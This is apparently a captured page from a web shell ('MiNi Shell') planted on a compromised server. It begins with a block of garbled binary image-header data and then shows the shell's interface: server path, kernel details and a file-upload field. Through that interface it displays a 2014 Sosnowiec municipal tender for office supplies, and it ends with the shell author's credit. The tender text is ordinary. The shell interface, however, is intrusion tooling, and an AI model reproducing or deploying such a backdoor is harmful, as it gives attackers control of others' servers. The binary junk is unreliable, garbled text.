JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140616/129265-N-2014.html

<p class="kh_header"><b>Sosnowiec: Zakup artykułów biurowych dla potrzeb Projektu - Wyższa jakość edukacji w Sosnowcu. Projekt współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół - CZĘŚĆ I</b><br>
<b>Numer ogłoszenia: 129265 - 2014; data zamieszczenia: 16.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup artykułów biurowych dla potrzeb Projektu - Wyższa jakość edukacji w Sosnowcu. Projekt współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół - CZĘŚĆ I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia zakup i dostarczenie artykułów biurowych - w ramach Projektu - Wyższa jakość edukacji w Sosnowcu. Projekt współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego , Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół -takich jak:<br>
1. Segregator ( format: A4, grzbiet: 75 mm/ 50 mm, materiał: wykonany z twardej 2 mm tektury , pokryty z zewnątrz matową folią PP, wewnątrz wyklejka papierowa, mechanizm dźwigniowy z dociskiem, oczko grzbietowe,  okucia owalne na przedniej okładce, dolne krawędzie wzmocnione metalową listwą, kolor: biały); 
2.Papier - ryza ( gramatura: 80g/m2, białość (CIE):  146 ? 3, Nieprzezroczystość (%):  > 91, Grubość (lm): 103?3, Gładkość: 220?60, opakowanie 1 ryza: 500 arkuszy);
3.Koszulki ( format A4, materiał: multiperforowane, otwierane u góry, wykonane z folii PP groszkowej, grubość: 46 mic, opakowanie: 100 szt. );
4.Skoroszyt PVC A4 twardy (format:  A4, 	wymiary: 230x310mm, materiał: wykonany z pcv o grubości 150mic (przód) oraz 160mic (tył), dwustronnie zapi-sywalny pasek, pojemność:  min. 2cm, kolor: szary);
5.Wąsy skoroszytowe ( materiał:  metalowe wąsy z listewką dociskową , oraz sztywną podkładką z PP, perforacja: 6 i 8 cm, Wielkość w mm: 150 x 38, kolor: wielokolorowe);
6.Nożyczki biurowe ergonomiczne ( materiał: trwałe ostrza z stali nierdzewnej satynowanej, ergonomiczny i miękki uchwyt, odporny na pęknięcia, długość:  210 mm);
7.Marker ze ściętą końcówką ( szerokość końcówki:  1 - 5 mm, marker permanentny na bazie wody - bezwonny, nie przesiąka przez papier, odporny na działanie światła i warunków atmosferycznych, zblokowana końcówka pisząca nie ugina się i nie cofa się pod naciskiem); 
8.Marker do płyt CD/DVD ( końcówka: miękką, okrągłą , średnica 0,5-1mm, materiały: obudowa wykonana z PP, tusz: wodoodporny, niezmywalny, odporny na rozmazywanie, kolor: czarny);
9.Zakreślasz fluorescencyjny ( końcówka ścięta, grubość  linii pisania: 1 - 5 mm, tusz : wodoodporny, duża odporność na wysychanie, do papieru zwykłego, samokopiującego i faksowego, kolor: wielokolorowy);
10.Długopis (automatyczny długopis, z profilowanym klipsem oraz wymiennym wkładem, materiał: transparentna obudowa, klips  w kolorze tuszu oraz gumowana rękojeść z anty- poślizgowymi żłobieniami, średnica kulki: 1mm, grubość linii pisania: 0,7mm, kolor: czarny, niebieski);
11.Ołówek ( materiał: ołówek drewniany z gumką do mazania, mocny i elastyczny grafit odporny na złamania, twardość: HB);
12. Gumka ołówkowa ( materiał: tworzywo sztuczne nie niszczące powierzchni ściernej, kartonowa obudowa - zabezpieczająca przed zabrudzeniem, kolor: biały, czarny);
13.Temperówka podwójna z pojemnikiem ( materiał: stalowe ostrze mocowane wkrętem, obudowa z mocnego plastiku z transparentnym  pojemnik na ścinki,  z dwoma otworami); 
14.Koperta C4 samoklejąca z paskiem ( format: C4, kolor: biały, koperta bez okienka, samoklejąca z paskiem); 
15.Koperta C5 samoklejąca z paskiem ( format: C5, kolor: biały, koperta bez okienka, samoklejąca z paskiem);
16.Koperta C4 poszerzana, samoklejąca z paskiem ( format: C4, kolor: biały, koperta bez okienka, samoklejąca z paskiem); 
17.Dziurkacz ( materiał: metalowa obudowa, metalowy mechanizm,  ogranicznik formatu A4/A5/A6/888, dwie dziurki, średnica dziurki 5.5 mm, odstęp pomiędzy dziurkami 80 mm, dziurkowanie do 25 kartek);
18.Zszywacz ( materiał: metalowy mechanizm, plastykowe ramię, metalowy element podający zszywki, antypoślizgowy spód, podstawa o wysokiej wytrzymałości, 	możliwość zszywania na zewnątrz, zszywki: 24/6 lub 26/6, głębokość wsunięcia kartki: 65mm, pojemność: 160 lub 200 zszywek);
19.Zszywki ( wykonane z materiału o dużej wytrzymałości, galwanizowane elektrycznie, rozmiar: 24/6, ilość w opakowania: 1000 szt.);
20.Zszywki ( wykonane z materiału o dużej wytrzymałości, galwanizowane elektrycznie, rozmiar: 26/6, ilość w opakowania: 1000 szt.);
21.Spinacze biurowe ( materiał: spinacz metalowy, rozmiar: 26 mm, ilość w opakowaniu: 1000 szt.);
22.Klipy metalowe ( materiał: metal galwanizowany, rozmiar:32 mm, ilość w opakowaniu:  12 szt.);
23.Etykiety samoprzylepne uniwersalne ( format: A4, przeznaczenie: do drukarek atramentowych, laserowych i kserokopiarek, ilość w opakowaniu: 100 arkuszy);
24.Bloczki samoprzylepne ( rozmiar: 76mm X 76 mm, ilość w kostce: 450 karteczek,
kolor: żółty);
25.Bloczki samoprzylepne ( rozmiar: 51mm x 58 mm, ilość w kostce: 100 karteczek,
kolor: żółty; 
26.Przeźroczysta taśma klejąca ( materiał:  polipropylen pokryty emulsyjnym klejem akrylowym, 	rozmiar: 24 mm x 20 m);
27.Przekładki indeksujące ( materiał: wytrzymały kolorowy karton, format: 1/3 A4,
wymiar: 10.5 x 24 cm, opakowanie:  100 szt.);
28.Półka na dokumenty ( wykonanie:  odporny na pęknięcia polistyren, przeznaczona na dokumenty w formacie A4, posiada miejsce na umieszczenie etykiet, kompatybilna- możliwość łączenia szufladek w pionie);
29.Kalkulator biurowy ( 12-pozycyjny wyświetlacz LCD , zasilanie bateryjne, zasilanie słoneczne, zaokrąglanie wyników, cofanie ostatnio wprowadzonej pozycji, klawisz podwójnego zera, duże klawisze, bez drukarki);
30.Przybornik na biurko ( bez wyposażenia, z miejscem na długopisy, spinacze  biurowe, kostkę biurową, materiał: wykonany z metalowej siatki powlekanej lakierem);
31.Aktówka A4 z ekoskóry,  zamykana na zamek ( Materiał: ekoskóra, Grubość:  4 cm, Kieszeń na dokumenty A4 zamykana na zamek, Wnętrze: uchwyt na długopis, kieszonki na wizytówki, kieszonka na pieczątkę, ring poczwórny na dokumenty, klip na dokumenty, Rączka na grzbiecie teczki, Rozmiar: 38 x 26 x 4 cm, Kolor: czarny/ brązowy);
32.Okładka na dyplom (dokumenty) A4 ( Materiał: ekoskóra, podklejona gąbką,
Format: A4, Wnętrze: wyklejone flokowaną (welurową) podszewką w kolorze okładki z bezbarwnymi czterema zakładkami na podtrzymanie dokumentów, Kolor: czarny/brązowy); <br>
Wykonawca będzie zobowiązany w ramach złożonej oferty do dostarczenia zapakowanych materiałów biurowych do siedziby Zamawiającego: Urząd Miejski Sosnowiec, Sosnowieckie Centrum Organizacji Pozarządowych, Aleja Zwycięstwa 20, 41-200 Sosnowiec, po wcześniejszym ustaleniu terminu dostaw z Zamawiającym. Dostarczanie towaru (pakowanie, załadunek, transport, rozładunek) leży po stronie Wykonawcy i odbywa się na jego koszt. <br>
Wykonawca będzie realizował zamówienie do wysokości kwoty, którą zamawiający zamierza przeznaczyć na ten cel. Umowa o udzielenie zamówienia publicznego zostanie zawarta na tę kwotę. <br>
Wykonawca będzie realizował dostawę po uprzednim otrzymaniu zlecenia od zamawiającego zawierającego ilości poszczególnych asortymentów. Wykonawca dostarczy artykuły wymienione w zleceniu w ciągu 3 dni roboczych od dnia przekazania zlecenia wykonawcy. Zlecenie będzie uzależnione od aktualnych potrzeb Zamawiającego, a do rozliczenia posłużą ceny jednostkowe wyszczególnione przez wykonawcę w Formularzu Cenowym.<br>
Warunkiem realizacji zamówienia będzie podpisanie przez Zamawiającego i Wykonawcę bez zastrzeżeń protokołu odbioru poszczególnych zamówień.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.95.00-5, 39.29.24.00-9, 30.19.70.00-6, 30.19.76.30-1, 30.19.21.25-3, 30.19.21.00-2, 30.19.92.30-1, 30.19.28.00-9, 30.19.71.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca do podpisania oferty ustanowi swojego reprezentanta wówczas jest zobowiązany załączyć do oferty pełnomocnictwo. Pełnomocnictwo to musi w swej treści jednoznacznie wskazać dokładny zakres umocowania w tym uprawienie do podpisania oferty, być dołączone do oferty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu 
Sosnowieckie Centrum Organizacji Pozarządowych 
al. Zwycięstwa 20, piętro 3, pokój 405
41-200 Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2014 godzina 11:00, miejsce: Urząd Miejski w Sosnowcu 
Sosnowieckie Centrum Organizacji Pozarządowych 
al. Zwycięstwa 20, piętro 3, pokój 405
41-200 Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Wyższa jakość edukacji w Sosnowcu. Projekt współfinansowany z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet III - Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com